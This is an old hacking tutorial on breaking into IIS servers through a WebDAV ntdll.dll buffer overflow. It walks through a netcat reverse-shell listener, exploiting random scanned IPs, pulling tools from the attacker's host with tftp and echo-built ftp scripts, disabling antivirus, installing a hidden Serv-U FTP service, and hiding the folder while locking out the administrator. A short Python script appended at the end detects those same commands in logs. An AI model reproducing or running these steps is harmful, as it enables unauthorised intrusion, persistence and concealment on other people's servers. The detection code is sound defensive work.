
In this tutorial I'll explain how to hack a WebDAV vulnerable server, and how to protect it.
Programs You need:
Servu tools: you can download yourself
Netcat
xwbf-v0.3
Tftp
Virus / Firewall killer
Start a DOS window.
Go to the folder with nc.exe and give the following command:
nc -L -vv -p 666
Then start another DOS window and run:
nc -L -vv -p 667
OK, if you have done that you will see something like this:
F:\>nc -L -vv -p 666
listening on [any] 666 ...
You have just successfully run NetCat. It is now listening and waiting to be changed into a reverse command line (a command line on the other computer).
Start the program: xwbf-v0.3 and fill in the following:
Target : the IP from your scan
Port : 80
Satan's IP : Your IP.
Port : 666
Custom Pads : (use default)
Padding : (use default)
Now all you need is a scan.
Pick a random IP and enter it into the program. Click on EXPLOIT. You should either see:
Checking ntdll.dll buffer overflow .....CONNECTED
sending evil buffer ......VULNERABLE
Connecting to 'xxx.xxx.39.159' .........CONNECTED
trying ret addr 0x00d000d0 ......DONE
Waiting for IIS to restart .........CONNECTED
trying ret addr 0x00d100d1
or
Checking ntdll.dll buffer overflow .....CONNECTED
sending evil buffer ...... NOT VULNERABLE
If it's vulnerable the program will start checking exploit addresses; when it gets access differs from system to system.
After a while NC.exe should display a CMD window. You have now successfully infiltrated the system and can choose between TFTP and ECHO hacking.
Create your own dir, like: mkdir c:\winnt\system32\drivers\dll\
First TFTP:
Start the program, push browse and select your dir with the files.
Then go to the remote shell and do:
tftp.exe -i YOURIP get kill.bat c:\Winnt\system32\drivers\dll\kill.bat
Navigate to your dir using the simple DOS command :
cd C:\Winnt\system32\drivers\dll\
Now run KILL.BAT. It will start to disable any virusscanners or firewalls.
When it's finished we'll upload the rest of the files:
tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon.exe (I recommend you change the name to sth else.)
tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon.ini
When TFTP has finished transferring the files, run the following command:
servudaemon.exe /i /s /h
And after that we are going to run the stro by simply using :
Net start servu
You can now log in to your stro with the desired username and password you specified.
Second method: Echo Hacking
For this you need a seed stro, to transfer the files from.
Run these commands:
echo open ipserver portserver >> c:\winnt\system32\drivers\dll\1.txt
echo user user >> c:\winnt\system32\drivers\dll\1.txt
echo password >> c:\winnt\system32\drivers\dll\1.txt
echo lcd c:\winnt\system32\drivers\dll >> c:\winnt\system32\drivers\dll\1.txt
echo get CommonDlg32.dll >> c:\winnt\system32\drivers\dll\1.txt
echo get drvrquery32.exe >> c:\winnt\system32\drivers\dll\1.txt
echo quit >> c:\winnt\system32\drivers\dll\1.txt
ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt
After doing the FTP command, it will start transferring the files from the stro
to your target.
What you just did with the command above is the following. You "echoed" commands into a txt file. Then you use FTP to open the txt file and execute its contents.
The hack is almost done; only the final step remains, to protect the dir from the admin.
Do this:
cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N
attrib +S +H c:\winnt\system32\drivers\dll\ /S /D
If that one does not work, do:
attrib +S +H c:\winnt\system32\drivers\dll\
Now the admin can't see in the dir anymore
Enjoy Your WebDAV Hack!
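
The tutorial promises a protection side; as an added example (not part of the original tutorial), this Python sketch flags the post-exploitation command lines shown above in process-creation logs and escalates a host when several distinct rules fire. The log format, host names, IP address, rule names, function names and the threshold of 3 are assumptions made for the example.

```python
import re
from collections import defaultdict

# Each pattern mirrors one post-exploitation command line from the tutorial.
RULES = {
    "tftp_download": re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\s+\S+", re.I),
    "ftp_script": re.compile(r"\bftp(\.exe)?\b(?=.*\s-s:\S+)(?=.*\s-n\b)", re.I),
    "acl_lockout": re.compile(r"\bcacls(\.exe)?\b.*\s/p\s+administrators?:n\b", re.I),
    "hide_dir": re.compile(r"\battrib(\.exe)?\b(?=.*\s\+s\b)(?=.*\s\+h\b)", re.I),
    "service_install": re.compile(r"\.exe\"?\s+/i\s+/s\s+/h\b", re.I),
    "servu_start": re.compile(r"\bnet1?(\.exe)?\s+start\s+servu\b", re.I),
}

# Constructed sample log, "time|host|command line"; hosts and IPs are made up.
SAMPLE_LOG = r"""
2003-04-02T10:15:01|WEB01|tftp.exe -i 192.0.2.10 get kill.bat c:\Winnt\system32\drivers\dll\kill.bat
2003-04-02T10:16:40|WEB01|servudaemon.exe /i /s /h
2003-04-02T10:16:55|WEB01|net start servu
2003-04-02T10:18:12|WEB01|ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt
2003-04-02T10:19:03|WEB01|cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N
2003-04-02T10:19:20|WEB01|attrib +S +H c:\winnt\system32\drivers\dll\ /S /D
2003-04-02T11:02:00|FILE02|attrib +S +H c:\backup\old
2003-04-02T11:05:00|FILE02|cacls c:\data /E /G Users:R
2003-04-02T11:07:00|FILE02|ftp ftp.example.com
"""

def match_rules(cmdline):
    """Names of all rules whose pattern matches this command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def hits_by_host(log_text):
    """Map host -> list of (time, rule) hits, in log order."""
    hits = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, host, cmd = line.split("|", 2)
        for rule in match_rules(cmd):
            hits[host].append((ts, rule))
    return dict(hits)

def compromised_hosts(log_text, threshold=3):
    """Hosts where at least `threshold` distinct rules fired."""
    return sorted(h for h, hs in hits_by_host(log_text).items()
                  if len({r for _, r in hs}) >= threshold)

if __name__ == "__main__":
    print(hits_by_host(SAMPLE_LOG))
    print("escalate:", compromised_hosts(SAMPLE_LOG))
```

A single hit such as the lone attrib line on FILE02 stays below the threshold, while the full sequence on WEB01 is escalated.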
